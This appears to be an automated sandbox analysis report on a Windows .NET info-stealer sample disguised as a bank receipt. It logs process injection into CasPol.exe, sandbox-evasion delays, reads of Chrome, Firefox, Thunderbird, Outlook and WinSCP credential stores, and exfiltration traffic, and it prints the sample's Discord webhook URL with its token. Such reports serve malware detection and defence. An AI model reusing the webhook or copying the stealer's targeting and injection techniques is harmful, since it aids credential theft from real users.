        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198293
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198186
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197963
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197516
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197405
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197162
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196891
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196779
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196638
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196309
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196093
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195984
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195875
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195656
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195547
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195432
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195312
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194499
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194391
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194062
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1193931
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: CasPol.exe, 00000001.00000003.312026803.0000000005BA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 754008
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Queries volume information: C:\Users\user\Desktop\e-dekont-20230207.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match File source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match File source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        ATT&CK matrix (one tactic per column; digits preceding a technique name are the report's signature-count badges for that technique; empty cells are left blank)
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 311 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 114 System Information Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 111 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | 1 Credentials in Registry | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 22 Software Packing | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 15 Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Remote System Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

        Source | Detection | Scanner | Label | Link
        e-dekont-20230207.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
        e-dekont-20230207.exe | 100% | Joe Sandbox ML |  |
        No Antivirus matches
        Source | Detection | Scanner | Label | Link | Download
        1.2.CasPol.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 |  | Download File
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://discord.com | 0% | URL Reputation | safe |
        http://discord.com | 0% | URL Reputation | safe |
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr | 0% | Avira URL Cloud | safe |
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | 0% | Avira URL Cloud | safe |
        https://discord.com4Dp | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        discord.com | 162.159.128.233 | true | true |  | unknown
        api4.ipify.org | 64.185.227.155 | true | false |  | high
        api.ipify.org | unknown | unknown | false |  | high
        Name | Malicious | Antivirus Detection | Reputation
        https://api.ipify.org/ | false |  | high
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.ipify.org | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://discord.com | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://discord.com | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://discord.com4Dp | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        162.159.128.233 | discord.com | United States |  | 13335 | CLOUDFLARENETUS | true
        64.185.227.155 | api4.ipify.org | United States |  | 18450 | WEBNXUS | false
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800710
                    Start date and time:2023-02-07 18:30:27 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 26s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230207.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.7% (good quality ratio 15.8%)
                    • Quality average: 62.8%
                    • Quality standard deviation: 34.3%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: e-dekont-20230207.exe
        Time | Type | Description
        18:31:29 | API Interceptor | 951x Sleep call for process: CasPol.exe modified
                    Process:C:\Users\user\Desktop\e-dekont-20230207.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):226
                    Entropy (8bit):5.354940450065058
                    Encrypted:false
                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                    MD5:B10E37251C5B495643F331DB2EEC3394
                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.965063063447085
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                    • Win64 Executable GUI (202006/5) 44.25%
                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                    • Win64 Executable (generic) (12005/4) 2.63%
                    • Generic Win/DOS Executable (2004/3) 0.44%
                    File name:e-dekont-20230207.exe
                    File size:688128
                    MD5:2fbaa4d917cce04617f24f87309286d6
                    SHA1:7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
                    SHA256:91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
                    SHA512:a2776ed384951898f491546f1050a26f744701c86478865e277288d5b639723f3d96a0cb8ca3e77941155d4fafc67970f4c2b713d0e16894ca58e3f3be718825
                    SSDEEP:12288:OEc+106G5pJptT7f98u1548XTTtSXIK4798qdGxd3rb5Oi4W21q1ni/:O1+1pG5znHz151ntSM9zEd3rb58H1Wg
                    TLSH:76E42212724F57BBE6296071C8FB087B13B57305A533D8A9BF1C12886F84B5B6E99F40
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!..................r............... ....@...... ....................................@................................
                    Icon Hash:00828e8e8686b000
                    Entrypoint:0x400000
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:
                    Instruction
                    dec ebp
                    pop edx
                    nop
                    add byte ptr [ebx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x598 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa9158 | 0x1c | .text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0xa71f4 | 0xa7200 | False | 0.9709777603777113 | data | 7.972775066304571 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .sdata | 0xaa000 | 0x1e8 | 0x200 | False | 0.861328125 | data | 6.632870559527538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0xac000 | 0x598 | 0x600 | False | 0.4147135416666667 | data | 4.06869988795393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country
                    RT_VERSION | 0xac0a0 | 0x30c | data | | 
                    RT_MANIFEST | 0xac3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | 
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    02/07/23-18:31:33.991128 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Feb 7, 2023 18:31:28.993040085 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:28.993093014 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:28.993184090 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.022833109 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.022871017 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.340893984 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.341072083 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.385968924 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.385994911 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.386605024 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.430265903 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.658529997 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.658596039 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.765906096 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.766043901 CET | 443 | 49689 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:31:29.768034935 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:29.768892050 CET | 49689 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:31:33.870203972 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.870248079 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.870311975 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.871211052 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.871223927 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.926682949 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.926832914 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.929459095 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.929469109 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.929898977 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.933212042 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.933223009 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.990571022 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:33.991055965 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:33.991079092 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:34.130938053 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:34.131040096 CET | 443 | 49690 | 162.159.128.233 | 192.168.2.5
                    Feb 7, 2023 18:31:34.131088018 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Feb 7, 2023 18:31:34.136661053 CET | 49690 | 443 | 192.168.2.5 | 162.159.128.233
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Feb 7, 2023 18:31:28.926114082 CET | 54949 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:31:28.946228027 CET | 53 | 54949 | 8.8.8.8 | 192.168.2.5
                    Feb 7, 2023 18:31:28.960350037 CET | 58218 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:31:28.980236053 CET | 53 | 58218 | 8.8.8.8 | 192.168.2.5
                    Feb 7, 2023 18:31:33.830131054 CET | 60998 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:31:33.850213051 CET | 53 | 60998 | 8.8.8.8 | 192.168.2.5
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Feb 7, 2023 18:31:28.926114082 CET | 192.168.2.5 | 8.8.8.8 | 0x4145 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.960350037 CET | 192.168.2.5 | 8.8.8.8 | 0x96d5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.830131054 CET | 192.168.2.5 | 8.8.8.8 | 0x3a38 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
